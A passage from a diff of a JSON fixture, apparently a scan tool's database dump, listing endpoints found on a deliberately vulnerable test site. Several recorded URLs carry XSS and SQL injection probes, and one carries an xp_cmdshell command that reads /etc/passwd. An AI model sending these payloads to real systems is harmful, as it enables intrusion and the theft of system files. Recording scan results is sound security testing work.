1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z'%22%3E%3Csvg%2Fonload%3Dalert(45)%3Eto", + "content_length": 5008, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:04.444Z", + "response_time": 0.345113339, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1932, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?id=1", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:04.720Z", + "response_time": 0.35649321700000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1933, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?id=1%27kOQjuk%3C%27%22%3EFcdVnA", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:05.007Z", + "response_time": 0.343191991, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1934, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?id=1%29%22%2C%28%27%2C%28%2C%29.", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:05.817Z", + "response_time": 0.352354908, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1936, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?id=5374", + "content_length": 4819, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:06.125Z", + "response_time": 0.34052813400000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1938, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/login.php", + "content_length": 5523, + "page_title": "login page", + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:26:06.496Z", + "response_time": 0.170377254, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1971, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg", + "content_length": 12426, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:17.350Z", + "response_time": 0.35280914, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1973, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "content_length": 4355, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:17.586Z", + "response_time": 0.35453904199999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1974, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg", + "content_length": 3324, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:17.706Z", + "response_time": 0.34382285, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1976, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "content_length": 1353, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:17.940Z", + "response_time": 0.352330507, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1977, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg", + "content_length": 9692, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:18.069Z", + "response_time": 0.353156027, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1979, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "content_length": 3725, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:20.687Z", + "response_time": 0.34995461499999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1980, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg", + "content_length": 13969, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:20.799Z", + "response_time": 0.350935537, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1982, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "content_length": 4615, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:21.164Z", + "response_time": 0.34861335400000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1983, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg", + "content_length": 14228, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:21.592Z", + "response_time": 0.35792623300000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1985, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "content_length": 4428, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:21.811Z", + "response_time": 0.34023138399999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1986, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg", + "content_length": 11465, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:22.295Z", + "response_time": 0.343837332, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1988, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "content_length": 4345, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:24.091Z", + "response_time": 0.35153797800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1989, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg", + "content_length": 19219, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:25.371Z", + "response_time": 0.5361690109999999, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1991, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "content_length": 6458, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:25.734Z", + "response_time": 0.358889919, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1992, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "content_length": 4139, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:26.611Z", + "response_time": 0.349617521, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1994, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/WS_FTP.LOG", + "content_length": 771, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:26.817Z", + "response_time": 0.343940359, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1996, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg", + "content_length": 50299, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:26:27.020Z", + "response_time": 0.6913679540000001, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2016, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/ipaddresses.txt", + "content_length": 52, + "page_title": null, + "http_status": 200, + "content_type": "text/plain", + "discovered_date": "2024-11-13T02:26:32.650Z", + "response_time": 0.358737464, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2017, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/path-disclosure-unix.html", + "content_length": 3936, + "page_title": "Pierre&Vacances", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:32.778Z", + "response_time": 0.341170009, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2018, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/path-disclosure-win.html", + "content_length": 698, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:34.440Z", + "response_time": 0.3547984, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2019, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/pictures/wp-config.bak", + "content_length": 1535, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:26:35.734Z", + "response_time": 0.348592063, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2031, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%283016%3D3777%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%203777%20UNION%20SELECT%206655%29%20END%29%29", + "content_length": 5174, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:38.087Z", + "response_time": 0.341013328, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2033, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1", + "content_length": 6428, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:38.366Z", + "response_time": 0.34516423700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2034, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1%20AND%203535%3D6381--%20rDMd", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:38.515Z", + "response_time": 0.34919062100000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2035, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1%20AND%206956%3D6956--%20bSrQ", + "content_length": 6428, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:38.671Z", + "response_time": 0.348291987, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2036, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1%20AND%208068%3D3952--%20HaHk", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:38.825Z", + "response_time": 0.350040144, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2041, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10", + "content_length": 6428, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:41.715Z", + "response_time": 0.354001418, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2061, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1&tdRI=6587%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23", + "content_length": 6428, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:48.646Z", + "response_time": 0.348924741, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2063, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=11", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:48.934Z", + "response_time": 0.35619417600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2064, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1813", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:49.087Z", + "response_time": 0.34906194799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2065, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1822", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:49.225Z", + "response_time": 0.345812018, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2066, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=1854", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:49.363Z", + "response_time": 0.348088782, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2072, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=2", + "content_length": 6368, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:52.287Z", + "response_time": 0.351867205, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2073, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=3", + "content_length": 6401, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:52.672Z", + "response_time": 0.340868993, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2079, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=3&hkNi=3073%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29", + "content_length": 6401, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:56.475Z", + "response_time": 0.350655235, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2080, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=4", + "content_length": 6453, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:56.618Z", + "response_time": 0.348140587, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2081, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=4135", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:56.814Z", + "response_time": 0.351195005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2082, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=5", + "content_length": 6382, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:57.688Z", + "response_time": 0.35338142699999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2083, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=6", + "content_length": 6454, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:57.827Z", + "response_time": 0.357661899, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2084, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=7", + "content_length": 5734, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:57.963Z", + "response_time": 0.341808674, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2085, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php?pic=8274", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:58.111Z", + "response_time": 0.34770198799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2951, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/redir.php?r=http://seonews1789.blogspot.com", + "content_length": 559, + "page_title": "502 Bad Gateway", + "http_status": 502, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:05.736Z", + "response_time": 0.354081227, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2962, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/artists.php", + "content_length": 146, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:16.141Z", + "response_time": 0.35373535399999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2963, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/htaccess.conf", + "content_length": 60, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:32:16.329Z", + "response_time": 0.342813753, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2967, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infocateg.php", + "content_length": 145, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:16.934Z", + "response_time": 0.345398419, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2971, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infocateg.php?id=1", + "content_length": 323, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:17.474Z", + "response_time": 0.34841072300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2972, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/infotitle.php", + "content_length": 145, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:17.613Z", + "response_time": 0.341735023, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2973, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/titles.php", + "content_length": 323, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:17.977Z", + "response_time": 0.354451941, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2974, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:20.627Z", + "response_time": 0.345863222, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": 